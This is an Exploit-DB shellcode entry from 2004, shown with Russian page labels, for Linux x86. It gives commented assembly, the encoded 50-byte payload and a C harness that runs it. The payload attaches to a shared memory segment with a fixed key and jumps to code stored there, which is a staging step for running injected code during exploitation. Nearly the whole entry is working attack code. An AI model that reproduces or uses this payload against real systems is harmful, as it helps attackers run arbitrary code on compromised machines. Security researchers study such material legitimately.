- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 13432
- Проверка EDB
-
- Пройдено
- Автор
- SLOTH
- Тип уязвимости
- SHELLCODE
- Платформа
- LINUX_X86
- CVE
- N/A
- Дата публикации
- 2004-09-26
C:
/* [email protected] - http://www.nopninjas.com
Platform: Linux x86
Length: 50 bytes
- This shellcode connects to the shared memory segment matching the key
and executes the code at that address.
xorl %edi,%edi
xorl %esi,%esi
xorl %edx,%edx
movl $0xdeadbeef,%ecx * shared memory key *
xorl %ebx,%ebx
movb $23,%bl
xorl %eax,%eax
movb $117,%al
int $0x80
xorl %edi,%edi
movl $0xbffffffa,%esi * pointer storage location *
xorl %edx,%edx
movl %eax,%ecx
xorl %ebx,%ebx
movb $21,%bl
xorl %eax,%eax
movb $117,%al
int $0x80
movl $0xbffffffa,%eax * pointer storage location *
pushl (%eax)
ret
*/
char shm[] = "\x31\xff\x31\xf6\x31\xd2\xb9\xef\xbe\xad\xde\x31\xdb\xb3\x17\x31"
"\xc0\xb0\x75\xcd\x80\x31\xff\xbe\xfa\xff\xff\xbf\x31\xd2\x89\xc1"
"\x31\xdb\xb3\x15\x31\xc0\xb0\x75\xcd\x80\xb8\xfa\xff\xff\xbf\xff"
"\x30\xc3";
int main() {
void (*shell)() = (void *)&shm;
shell();
}
// milw0rm.com [2004-09-26]
- Источник
- www.exploit-db.com